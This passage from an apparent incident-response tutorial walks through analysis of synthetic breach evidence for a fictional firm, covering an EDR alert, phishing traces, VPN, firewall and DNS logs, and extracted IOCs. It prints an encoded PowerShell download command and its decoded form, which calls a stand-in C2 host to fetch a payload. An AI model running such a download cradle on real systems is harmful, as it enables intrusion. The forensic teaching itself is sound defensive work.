two tables: Internal Sources and External Sources. Fill every row you have access to — and explicitly mark what is absent. Unknown coverage is not the same as no coverage.</p><h4>2. Fill in what you have</h4><p>For each log source, fill four fields: <strong>Source name</strong>, <strong>System(s) it covers</strong>, <strong>Admiralty reliability rating</strong>, and <strong>any known gap</strong>. Where a source is absent from a system that should have it, add a row with — absent in the Gap column. That absence is a finding.</p><p>For LifeTech, the completed source registry drives this inventory:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Mt6DCDNVu6YThxF6WCowcg.png"></figure><p><strong>GAP-001 — WS-IT-LEVI Sysmon: October 22 — November 1, 2024</strong></p><pre>Duration: 10 days<br>Root cause: Unknown — Sysmon forwarder stopped. Coincides exactly with<br>  the day the IT admin received a phishing email.<br>What is missing: process creation (EID 1), network connections (EID 3),<br>  file creation (EID 11) for this host during this entire window.<br>Impact: Cannot confirm or rule out attacker activity on WS-IT-LEVI<br>  between Oct 22 and Nov 1. All claims about this period are INFERRED<br>  or HYPOTHESIZED unless supported by alternative sources (VPN logs,<br>  DC authentication logs, firewall flows).<br>Possible cause: Deliberate anti-forensic technique — terminating Sysmon<br>  service is a known evasion method.</pre><p>The 10-day gap on the IT admin workstation starts the same day a phishing email was delivered to him. This is not coincidence — it is a finding.</p><h4>3. Create a GAP document for every gap</h4><p>Each gap gets its own file. Create it now:</p><pre>nano 01-evidence/GAP-001-ws-it-levi-sysmon.md</pre><p>Paste the filled template:</p><pre># GAP-001 — WS-IT-LEVI Sysmon | 2024-10-22 – 2024-11-01<br>Duration: 10 days (2024-10-22 11:31 UTC to 2024-11-01 09:14 UTC)<br>Root cause: Sysmon forwarder stopped. Coincides exactly with delivery<br>  of phishing email to p.levi at 11:23 UTC.<br>What is missing: EID 1 (process creation), EID 3 (network connections),<br>  EID 11 (file creation) for WS-IT-LEVI during this entire window.<br>Impact: Cannot confirm or rule out attacker activity during this period.<br>  All claims covering Oct 22–Nov 1 on this host are INFERRED or<br>  HYPOTHESIZED unless corroborated by VPN logs, DC auth logs, or<br>  firewall flows.<br>Possible cause: Deliberate - terminating Sysmon is T1562.001 (Impair<br>  Defenses). A gap coinciding with a malicious delivery is itself a<br>  finding, not merely an absence.</pre><h4>4. Commit the evidence inventory</h4><pre>git add 01-evidence/ 02-sources/source-registry.md<br>git commit -m "PROJ-2024-001: evidence inventory — 6 sources, GAP-001 (10-day Sysmon gap WS-IT-LEVI Oct 22–Nov 1), firewall log retrieval urgent before Nov 20"</pre><h3>Step R1.5: Hands-On Evidence Analysis — VS Code Investigation</h3><p>The evidence inventory tells you what exists. This step analyzes it. VS Code is the primary tool: one window holds the evidence tree, the formatted logs, the API calls, and the terminal — no context-switching between applications.</p><h4>Setup — Open the Evidence Folder</h4><pre># One command opens the entire evidence directory as a workspace<br>code ~/investigations/lifetech-2024-11/01-evidence/</pre><p>VS Code opens with the Explorer panel showing the full evidence tree. Every JSON, JSONL, CSV, and syslog file is one click away.</p><p><strong>Install four extensions before starting</strong> (Ctrl+Shift+X, search by ID):</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*LyER2G4y2xTAF1kXY4MX6A.png"></figure><p>Or install all at once from the integrated terminal (Ctrl+`` ):</p><pre>code --install-extension mechatroner.rainbow-csv<br>code --install-extension humao.rest-client<br>code --install-extension ms-vscode.hexeditor<br>code --install-extension esbenp.prettier-vscode</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/991/1*Pp_6YW13coi4GWZcb2a8Wg.png"></figure><p><strong>Key VS Code shortcuts used throughout this step:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2i3dAl46V_xX0cqntP0rCw.png"></figure><p><strong>Download the training evidence:</strong></p><pre>git clone https://github.com/anpa1200/CTI_as_a_Code.git<br>code ~/CTI_as_a_Code/investigations/lifetech-2024-11/01-evidence/</pre><p>Direct links to open any file in GitHub (also downloadable via curl -L):</p><ul><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/m365/message-trace-p.levi.csv">m365/message-trace-p.levi.csv</a><br><strong>Format:</strong> CSV<br><strong>Contains:</strong> IT admin phishing delivery, Oct 15–24</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/m365/message-trace-m.cohen.csv">m365/message-trace-m.cohen.csv</a><br><strong>Format:</strong> CSV<br><strong>Contains:</strong> CFO phishing delivery, Nov 13–15</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/azure-ad/signin-p.levi.json">azure-ad/signin-p.levi.json</a><br><strong>Format:</strong> JSON<br><strong>Contains:</strong> IT admin Azure AD sign-ins — Istanbul token replay</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/vpn/anyconnect-2024-10-24.log">vpn/anyconnect-2024-10-24.log</a><br><strong>Format:</strong> ASA syslog<br><strong>Contains:</strong> VPN session from Istanbul, Oct 24</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/sysmon/WS-CFO-01-sysmon.jsonl">sysmon/WS-CFO-01-sysmon.jsonl</a><br><strong>Format:</strong> JSONL<br><strong>Contains:</strong> CFO workstation — PowerShell, LSASS, persistence, BITS</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/crowdstrike/WS-CFO-01-alert-20241115.json">crowdstrike/WS-CFO-01-alert-20241115.json</a><br><strong>Format:</strong> JSON<br><strong>Contains:</strong> CrowdStrike Falcon alert — triggering detection</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/windows-security/DC01-security.jsonl">windows-security/DC01-security.jsonl</a><br><strong>Format:</strong> JSONL<br><strong>Contains:</strong> DC01 security events — DCSync EID 4662</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/windows-security/SERVER-RD-02-security.jsonl">windows-security/SERVER-RD-02-security.jsonl</a><br><strong>Format:</strong> JSONL<br><strong>Contains:</strong> R&amp;D server — EID 4663 file access, EID 5156 exfil</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/palo-alto/ngfw-flows.csv">palo-alto/ngfw-flows.csv</a><br><strong>Format:</strong> CSV<br><strong>Contains:</strong> Perimeter firewall flows — 381 MB exfil confirmed</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/palo-alto/dns-queries.csv">palo-alto/dns-queries.csv</a><br><strong>Format:</strong> CSV<br><strong>Contains:</strong> DNS telemetry — C2 beacon pattern</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/sql-audit/SERVER-RD-02-sql-audit.jsonl">sql-audit/SERVER-RD-02-sql-audit.jsonl</a><br><strong>Format:</strong> JSONL<br><strong>Contains:</strong> SQL Server audit — full xp_cmdshell exfil chain</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/GAP-001-ws-it-levi-sysmon.md">GAP-001-ws-it-levi-sysmon.md</a><br><strong>Format:</strong> Markdown<br><strong>Contains:</strong> Documented 10-day Sysmon gap on IT admin host</li></ul><h4>1. CrowdStrike Alert — JSON in VS Code</h4><p><strong>In VS Code Explorer:</strong> click crowdstrike/WS-CFO-01-alert-20241115.json</p><p>Press Shift+Alt+F to auto-format. The nested structure becomes readable with collapsible sections.</p><p><strong>Open the Outline panel</strong> (Ctrl+Shift+O):</p><pre>▶ meta<br>▼ resources<br>  ▼ [0]<br>    ▶ device        — hostname, OS, groups<br>    ▼ behaviors<br>      [0] Execution / T1059.001  — OUTLOOK.EXE → powershell.exe<br>      [1] Command and Control / T1071.001<br>      [2] Persistence / T1547.001<br>      [3] Credential Access / T1003.001<br>    ▶ network_accesses<br>    ▶ prevention_policy</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EHUHyPz18JBNmPFRWS5VHA.png"></figure><p>Click any node to jump directly to that section. Click prevention_policy — you see "prevent": false immediately. The CFO's machine is in detect-only mode; the C2 connection is live. <strong>Take the memory dump before anything else.</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bsA6unjBprE5asg-jKFbug.png"></figure><p><strong>Search</strong> (Ctrl+F): type prevented → jumps to "prevent": false. Type cmdline → jumps to the encoded PowerShell command.</p><p><strong>Or use jq tool:</strong></p><p><strong>Extract key fields in the integrated terminal</strong> (Ctrl+`` ):</p><pre>jq '.resources[0] | {<br>  detection_id,<br>  severity:  .max_severity_displayname,<br>  host:      .device.hostname,<br>  prevented: .prevention_policy.prevent,<br>  timestamp: .created_timestamp<br>}' crowdstrike/WS-CFO-01-alert-20241115.json</pre><p>Output:</p><pre>{<br>  "detection_id": "ldt:8f2a4b91e33a471cae44b2fdb8812201:884921003",<br>  "severity":     "Critical",<br>  "host":         "WS-CFO-01",<br>  "prevented":    false,<br>  "timestamp":    "2024-11-15T16:42:47.882Z"<br>}</pre><pre># List all detected behaviors<br>jq '.resources[0].behaviors[] | {<br>  timestamp, tactic, technique_id, display_name,<br>  parent: .parent_image_filename,<br>  image:  .filename,<br>  cmdline: (.cmdline // "" | .[0:80])<br>}' crowdstrike/WS-CFO-01-alert-20241115.json</pre><pre># Network connections observed<br>jq '.resources[0].network_accesses[] | {<br>  remote_address, remote_port, direction, timestamp<br>}' crowdstrike/WS-CFO-01-alert-20241115.json</pre><pre># Prevention policy — confirm detect-only mode and note the policy gap<br>jq '.resources[0].prevention_policy | {name, prevent, detect, note}' \<br>  crowdstrike/WS-CFO-01-alert-20241115.json</pre><p><strong>Found IOCs</strong></p><ul><li><strong>Host</strong> WS-CFO-01 — Victim workstation; CrowdStrike detect-only, C2 active</li><li><strong>Hash (SHA256)</strong> de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1848474f57 — powershell.exe behavior hash from alert</li><li><strong>Hash (MD5)</strong> 7353f60b1739074eb17c5f4dddefe239 — Same behavior; use both for VT lookup</li><li><strong>Process</strong> OUTLOOK.EXE → powershell.exe — Parent–child execution chain in behaviors[0]</li><li><strong>Cmdline</strong> -NonI -W Hidden -Enc JABjAD0A… — Encoded PowerShell payload; decode in Step 2</li><li><strong>IP</strong> 203.0.113.87 — C2 server; 3 connections in network_accesses, port 443</li></ul><h4>2. Decode the PowerShell Payload</h4><p>In the formatted JSON still open in VS Code, press Ctrl+F and search -Enc — the base64 argument is on the same line. Copy it.</p><p><strong>Decode in the integrated terminal</strong> — do not paste encoded malware into online decoders:</p><pre># PowerShell -Enc uses UTF-16LE encoding<br>echo "JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABkAD0AJABjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMgAwADMALgAwAC4AMQAxADMALgA4ADcALwB1AHAAZABhAHQAZQAnACkA" \<br>  | base64 -d</pre><p>Output:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*gtvadCAbVwcFaB8UcvEPCQ.png"></figure><pre>$c=New-Object System.Net.WebClient;$c.Headers.Add('User-Agent','Mozilla/5.0');$d=$c.DownloadString('https://203.0.113.87/update')</pre><p><strong>In VS Code Explorer:</strong> click sysmon/WS-CFO-01-sysmon.jsonl. Press Ctrl+F, search "EventID": 11 — jumps to the file creation event showing svchost32.exe dropped to AppData\Roaming. The analyst_note field confirms the fake PE timestamp.</p><pre># Cross-check: confirm what the PowerShell dropped<br>jq 'select(.EventID == 11) | {<br>  time: .TimeCreated, dropped_by: .Image, file: .TargetFilename, note: .analyst_note<br>}' sysmon/WS-CFO-01-sysmon.jsonl</pre><p><strong>Or use Base64 extention:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NX8NZYV10DhI03Lgy9E07A.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hRToibL_ojf36voYhSco2A.png"></figure><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 203.0.113.87 — Primary C2 server; payload download source</li><li><strong>URL</strong> https://203.0.113.87/update — C2 payload URL decoded from base64 PowerShell</li><li><strong>File</strong> svchost32.exe — Dropper deposited to %AppData%\Roaming\; forged PE timestamp</li></ul><h4>3. M365 Message Trace — Rainbow CSV</h4><p><strong>In VS Code Explorer:</strong> click m365/message-trace-p.levi.csv</p><p>With Rainbow CSV installed, every column gets its own color. The status bar at the bottom shows the column name as you move the cursor.</p><p><strong>RBQL — SQL queries against the CSV, no Python needed:</strong></p><p>Press F5 (or click RBQL in the status bar) to open the query console:</p><pre>-- Find all emails where authentication failed<br>SELECT a.* WHERE a16 == "fail" ORDER By a1</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IF23O_x92zR5XPNGe7gP2A.png"></figure><p>Result pane (right side):</p><pre>2024-10-22T11:23:07Z | security-noreply@mfa-lifetechpharma.com<br>  | ACTION REQUIRED: MFA Re-enrollment — LifeTech IT Security<br>  | Delivered | 4 | fail | fail | fail</pre><p>Three auth failures in one row. SCL=4 delivered because the threshold is 5. Add mfa-lifetechpharma.com to IOC list.</p><pre>SELECT a.* WHERE a17 == '1' &amp;&amp; a16 == 'fail'</pre><p><strong>Save RBQL results:</strong> click <strong>Save to CSV</strong> in the result panel → save as 03-analysis/m365-suspects.csv.</p><p><strong>Switch to </strong><strong>m365/message-trace-m.cohen.csv</strong> (click in Explorer):</p><pre>-- CFO mailbox — find the malicious delivery<br>SELECT a.received_time, a.sender_address, a.subject, a.SCL, a.DMARC, a.has_attachment<br>FROM a<br>WHERE a.DMARC == 'fail' OR a.has_attachment == '1'<br>ORDER BY a.received_time</pre><p>Key finding — CFO phishing email:</p><pre>2024-11-15T15:58:08Z | contracts@globalcontracts-secure.net<br>  | Q4-2024 Licensing Agreement Review — Action Required (URGENT)<br>  | SCL=4 | DMARC=fail | has_attachment=1</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*p6mJFnpdRJE2EvoF-IxUFw.png"></figure><p>The .xlsm attachment was not sandboxed — ATP policy gap (INT-007). Add globalcontracts-secure.net to IOC list.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Domain</strong> mfa-lifetechpharma.com — AiTM phishing sender domain; DMARC/DKIM/SPF all fail</li><li><strong>Email</strong> security-noreply@mfa-lifetechpharma.com — IT admin phishing sender (Oct 22)</li><li><strong>Domain</strong> globalcontracts-secure.net — CFO phishing delivery domain</li><li><strong>Email</strong> contracts@globalcontracts-secure.net — CFO phishing sender (Nov 15)</li><li><strong>Attachment</strong> .xlsm — Macro-enabled Excel; bypassed ATP sandbox (INT-007)</li></ul><h4>4. Azure AD Sign-In Analysis</h4><p><strong>In VS Code Explorer:</strong> click azure-ad/signin-p.levi.json</p><p>Press Shift+Alt+F to format. Open the Outline (Ctrl+Shift+O) — the array shows four sign-in entries. Click entry [1] to jump to aad-signin-002.</p><p><strong>Search</strong> Ctrl+F: type Istanbul — jumps directly to the suspicious sign-in. Read surrounding context without running any command:</p><pre>"city": "Istanbul",<br>"countryOrRegion": "TR",<br>"conditionalAccessStatus": "notApplied",<br>"succeeded": null</pre><p>Three red flags visible immediately in the file: foreign city, CA bypassed, no MFA.</p><p><strong>Full structured extraction in the terminal:</strong></p><pre>jq '.[] | {<br>  id,<br>  time: .properties.createdDateTime,<br>  ip:   .properties.ipAddress,<br>  loc:  "\(.properties.location.city), \(.properties.location.countryOrRegion)",<br>  mfa:  .properties.authenticationDetails[0].succeeded,<br>  ca:   .properties.conditionalAccessStatus,<br>  os:   .properties.deviceDetail.operatingSystem<br>}' azure-ad/signin-p.levi.json</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XkLVEejy4bkZ71px3sihoQ.png"></figure><p><strong>Red flags on </strong><strong>aad-signin-002:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Isdphk9PrvplMM2sWbc8Vg.png"></figure><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 185.220.101.47 — Attacker source IP; Istanbul, Turkey (Tor exit node)</li><li><strong>Account</strong> p.levi — Compromised IT admin; token replay, no MFA challenge</li><li><strong>Indicator</strong> Token replay — CA policy bypassed; conditionalAccessStatus: notApplied</li></ul><h4>5. VPN Log Analysis</h4><p><strong>In VS Code Explorer:</strong> click vpn/anyconnect-2024-10-24.log</p><p>VS Code opens the plain syslog file. Use Ctrl+F to navigate without any commands:</p><ul><li>Search p.levi — highlights every line for this user</li><li>Search Authentication: successful — the auth event</li><li>Search Assigned address — the internal IP assigned to the session</li><li>Search Duration — total session length</li></ul><pre># Full session chain in the terminal:<br>grep "p.levi" vpn/anyconnect-2024-10-24.log \<br>  | grep -E "(716001|716002|734001|Authentication|Teardown|Assigned)"</pre><p>Output:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BsNecLZvZT8bDwFYWsb-nQ.png"></figure><pre>Oct 24 00:17:14 ... User &lt;p.levi&gt; IP &lt;185.220.101.47&gt; Authentication: successful<br>Oct 24 00:17:33 ... User &lt;p.levi&gt; ... Assigned address: 10.10.3.22<br>Oct 24 02:29:08 ... User &lt;p.levi&gt; ... Duration: 1h12m34s</pre><p>185.220.101.47 (Istanbul VPN exit) authenticated as p.levi and was assigned 10.10.3.22 — WS-IT-LEVI's own internal IP. All activity during this session looks like it came from the legitimate workstation.</p><pre>grep -i "mfa\|no.*challenge\|bypass" vpn/anyconnect-2024-10-24.log<br># → NOTE: No MFA challenge issued — session token authentication bypass<br>grep "203.0.113.87" vpn/anyconnect-2024-10-24.log | awk '{print $1,$2,$3}' | head -8<br># → ~7-minute C2 beacons during the VPN session window</pre><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 185.220.101.47 — Attacker VPN source; Istanbul; authenticated as p.levi</li><li><strong>Account</strong> p.levi — Session token auth; no MFA challenge issued</li><li><strong>IP (internal)</strong> 10.10.3.22 — Assigned to attacker session; masks as WS-IT-LEVI</li><li><strong>IP</strong> 203.0.113.87 — C2 beacons during VPN session (~7-min interval)</li></ul><h4>6. NGFW Log Analysis — Rainbow CSV</h4><p><strong>In VS Code Explorer:</strong> click palo-alto/ngfw-flows.csv</p><p>Rainbow CSV colorizes columns. The status bar shows column names as you move the cursor.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Yz7EggRReYdjyRyz79n79A.png"></figure><p>RBQLHeader<br>a1receive_time<br>a22dport<br>a5src<br>a28bytes<br>a6dst<br>a29bytes_sent<br>a9rule<br>a30bytes_received<br>a10srcuser<br>a33elapsed<br>a12app<br>a34category<br>a27action<br>a41session_end_reason</p><p><strong>In VS Code Explorer:</strong> click palo-alto/ngfw-flows.csv. Press F5 to open the RBQL console.</p><p><strong>Query 1 — find anomalies: all flows sorted by bytes_sent descending</strong></p><p>Start here every time. The outlier appears immediately.</p><pre>SELECT a1, a5, a6, a22,<br>       Math.round(parseInt(a29) / 1048576) + ' MB' AS sent_MB,<br>       Math.round(parseInt(a30) / 1024) + ' KB' AS rcvd_KB,<br>       a33 + 's', a10<br>ORDER BY parseInt(a29) DESC</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pszv_-CeRnD-lNlUmL8VBQ.png"></figure><pre>2024-11-06T00:14:14Z | 10.10.2.15 | 198.51.100.44 | 443 | 381 MB | 409 KB | 312s |<br>2024-11-15T16:42:41Z | 10.10.1.45 | 203.0.113.87  | 443 |  17 MB |  10 KB |  63s | LIFETECHPHARMA\m.cohen<br>2024-11-15T16:49:22Z | 10.10.1.45 | 203.0.113.87  | 443 |  14 MB |  10 KB |  61s | LIFETECHPHARMA\m.cohen<br>2024-11-15T16:56:03Z | 10.10.1.45 | 203.0.113.87  | 443 |  14 MB |  10 KB |  59s | LIFETECHPHARMA\m.cohen<br>2024-11-06T00:09:44Z | 10.10.3.22 | 203.0.113.87  | 443 |   9 KB |   7 KB |  51s | LIFETECHPHARMA\p.levi<br>...</pre><p>The first row is 17,000× larger than any other flow. Upload ratio 99% (381 MB sent, 409 KB received). Session lasted 312 seconds. This is data exfiltration, not a download.</p><p>Two hosts are beaconing to the same C2 IP: 10.10.3.22 (IT admin, p.levi) and 10.10.1.45 (CFO, m.cohen) — two separate infections.</p><p><strong>Query 2 — exfil upload ratio: flag flows where sent &gt; 90% of total bytes</strong></p><pre>SELECT a1, a5, a6, a22,<br>       Math.round(parseInt(a29) / 1048576) + ' MB' AS sent_MB,<br>       Math.round(parseInt(a29) * 100 / (parseInt(a28) + 1)) + '%' AS upload_pct,<br>       a33 + 's'<br>WHERE parseInt(a28) &gt; 100000<br>ORDER BY parseInt(a29) DESC</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*UkpGfIAnhSx0k-VE5CATzg.png"></figure><p>Result: only one row — 10.10.2.15 → 198.51.100.44, 99% upload, 381 MB. Every other flow is bidirectional C2 (55–65% upload) which is beacon traffic, not exfil.</p><p><strong>Query 3 — beacon pattern: repeated small flows to same external IP</strong></p><pre>SELECT a6, COUNT(a6) AS sessions,<br>       AVG(parseInt(a28)) AS avg_bytes,<br>       AVG(parseInt(a33)) AS avg_elapsed_s<br>WHERE a6 &amp;&amp; !a6.startsWith('10.') &amp;&amp; !a6.startsWith('192.168.')<br>   &amp;&amp; !isNaN(parseInt(a28))<br>GROUP BY a6Result:</pre><pre>203.0.113.87   | 9 sessions | ~14 KB avg | ~47s avg<br>198.51.100.44  | 1 session  | 399 MB avg | 312s avg</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*264pKTvyyeuGVoAIwQVvSw.png"></figure><p>203.0.113.87 has 9 short uniform sessions — beacon. 198.51.100.44 has one giant session — exfil.</p><p><strong>Query 4 — internal lateral movement: flows that stay inside RFC-1918</strong></p><pre>SELECT a1, a5, a6, a22, a28, a9, a10<br>WHERE a5 &amp;&amp; a6<br>   &amp;&amp; (a5.startsWith('10.') || a5.startsWith('192.168.'))<br>   &amp;&amp; (a6.startsWith('10.') || a6.startsWith('192.168.'))<br>ORDER BY a1</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*epr64_sA5gqNzWxgEi-LpQ.png"></figure><pre>2024-11-15T19:14:08Z | 10.10.1.45 | 10.10.2.20 | 135   | 8441  | InternalAccess-Allow<br>2024-11-15T19:14:18Z | 10.10.1.45 | 10.10.2.20 | 49152 | 12884 | InternalAccess-Allow</pre><p>CFO workstation (10.10.1.45) connected to an internal host (10.10.2.20) on port 135 (DCE/RPC endpoint mapper) then port 49152 (dynamic RPC). This is the WMI/DCOM lateral movement signature — 3 hours after the CFO was compromised.</p><p><strong>Query 5 — beacon timing: isolate C2 host and sort by time to measure intervals</strong></p><pre>SELECT a1, a5, a6, parseInt(a29) AS bytes_sent, a33 + 's'<br>WHERE a6 == '203.0.113.87'<br>ORDER BY a1</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*f8M-EcFKrYAOXIzIOfoNlw.png"></figure><pre>2024-11-01T07:14:02Z | 10.10.3.22 | 8441 bytes | 47s   ← WS-IT-LEVI session 1<br>2024-11-01T07:21:14Z | 10.10.3.22 | 8221 bytes | 45s   ← gap: 432s<br>2024-11-01T07:28:44Z | 10.10.3.22 | 7882 bytes | 44s   ← gap: 450s<br>                     ↓ 4.7-day silence (C2 dormant) ↓<br>2024-11-06T00:09:44Z | 10.10.3.22 | 9441 bytes | 51s   ← WS-IT-LEVI session 2<br>2024-11-06T00:17:01Z | 10.10.3.22 | 8001 bytes | 46s   ← gap: 437s<br>2024-11-06T00:24:33Z | 10.10.3.22 | 8011 bytes | 44s   ← gap: 452s<br>2024-11-15T16:42:41Z | 10.10.1.45 | 18221 bytes| 63s   ← WS-CFO-01 session 1<br>2024-11-15T16:49:22Z | 10.10.1.45 | 14441 bytes| 61s   ← gap: 401s<br>2024-11-15T16:56:03Z | 10.10.1.45 | 15001 bytes| 59s   ← gap: 421s</pre><p>Beacon interval: <strong>432–452 seconds (~7.2 minutes)</strong>. Consistent across both infected hosts — same implant, same configuration. The 4.7-day gap (Nov 1–6) between IT admin beacon clusters is the C2 going quiet while staging lateral movement.</p><p><strong>Click </strong><strong>palo-alto/dns-queries.csv</strong> in Explorer.</p><p><strong>Column map:</strong></p><p>RBQLHeader<br>a1receive_time<br>a2src<br>a4query<br>a6response<br>a8category<br>a10analyst_note</p><p><strong>Query 6 — all malware-category queries, sorted by time</strong></p><pre>SELECT a1, a2, a4, a6, a8<br>FROM a<br>WHERE a8 == 'malware'<br>ORDER BY a1</pre><p>Result — full malware DNS timeline:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*RErM3MswME78yNNi0pB92A.png"></figure><pre>2024-10-22T09:28:41Z | 10.10.3.22 | mfa-lifetechpharma.com       | 185.220.101.47  | malware ← AiTM phishing page loaded<br>2024-10-22T09:29:02Z | 10.10.3.22 | mfa-lifetechpharma.com       | 185.220.101.47  | malware ← token stolen<br>2024-11-01T07:14:00Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware ← C2 beacon 1<br>2024-11-01T07:21:14Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-01T07:28:44Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-06T00:09:01Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-06T00:17:01Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware ← (missing from log)<br>2024-11-06T00:24:33Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-06T00:10:14Z | 10.10.2.15 | sys-update-cdn.net            | 198.51.100.44   | malware ← exfil domain lookup<br>2024-11-15T15:58:08Z | 10.10.1.45 | globalcontracts-secure.net    | 185.220.101.52  | malware ← CFO phishing domain<br>2024-11-15T16:42:33Z | 10.10.1.45 | telemetry-cdn-services.biz   | 203.0.113.87    | malware ← CFO C2 beacon 1<br>2024-11-15T16:49:22Z | 10.10.1.45 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-15T16:56:03Z | 10.10.1.45 | telemetry-cdn-services.biz   | 203.0.113.87    | malware</pre><p><strong>Query 7 — per-host beacon count: how many hosts are infected?</strong></p><pre>SELECT a2, COUNT(a2) AS queries<br>WHERE a4 == 'telemetry-cdn-services.biz'<br>GROUP BY a2</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*v94DK5JOd0MBwJUOjqBpAg.png"></figure><pre>10.10.3.22 | 6   ← WS-IT-LEVI (IT admin) — infected Nov 1<br>10.10.1.45 | 3   ← WS-CFO-01 (CFO) — infected Nov 15</pre><p>Two hosts. Two infections. Same C2 domain. The IT admin host was the initial foothold; the CFO host is the second wave, 14 days later.</p><p><strong>Query 8 — new IP: attacker recon before VPN login</strong></p><pre>SELECT a1, a2, a4, a6, a8, a10<br>WHERE a2 &amp;&amp; !a2.startsWith('10.') &amp;&amp; !a2.startsWith('192.168.')<br>ORDER BY a1</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lj9D7dZos_et_O16rjcfOg.png"></figure><pre>2024-10-24T00:16:44Z | 185.220.101.47 | vpn.lifetechpharma.com | 10.10.8.1 | business-and-economy</pre><p>The attacker IP (185.220.101.47) looked up the VPN hostname 1 minute before the successful VPN login. Confirms active operator, not automated tool.</p><p><strong>Cross-reference with flows</strong> (Ctrl+Shift+F → 198.51.100.44):</p><pre>ngfw-flows.csv   line 11: 10.10.2.15 → 198.51.100.44 | 399 MB | 312s<br>dns-queries.csv  line 14: 10.10.2.15 → sys-update-cdn.net → 198.51.100.44</pre><p>DNS lookup at 00:10:14Z, flow starts at 00:14:14Z — 4-minute gap between resolution and transfer start. Consistent with manual operator staging the upload command.</p><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 198.51.100.44 — Exfil destination; 381 MB upload, 99% upload ratio, 312s, single session</li><li><strong>IP (internal)</strong> 10.10.2.15 — SERVER-RD-02; exfil source host</li><li><strong>IP</strong> 203.0.113.87 — C2 server; 9 beacon sessions from 2 hosts, ~7.2-min interval</li><li><strong>IP</strong> 185.220.101.52 — New; CFO phishing page host (globalcontracts-secure.net)</li><li><strong>IP (internal)</strong> 10.10.2.20 — Lateral movement target; reached from CFO host on ports 135 + 49152 (RPC/WMI)</li><li><strong>Domain</strong> telemetry-cdn-services.biz — C2 domain; queried by both 10.10.3.22 and 10.10.1.45</li><li><strong>Domain</strong> sys-update-cdn.net — Exfil domain; resolves to 198.51.100.44; queried by 10.10.2.15</li><li><strong>Domain</strong> mfa-lifetechpharma.com — AiTM phishing domain; resolves to 185.220.101.47</li><li><strong>Indicator</strong> Beacon interval 432–452s (~7.2 min) — identical across both infected hosts; same implant config</li><li><strong>Indicator</strong> Attacker recon: 185.220.101.47 queried vpn.lifetechpharma.com 1 min before VPN login7. SQL Audit Log Analysis</li></ul><h4><strong>7. SQL Audit Log 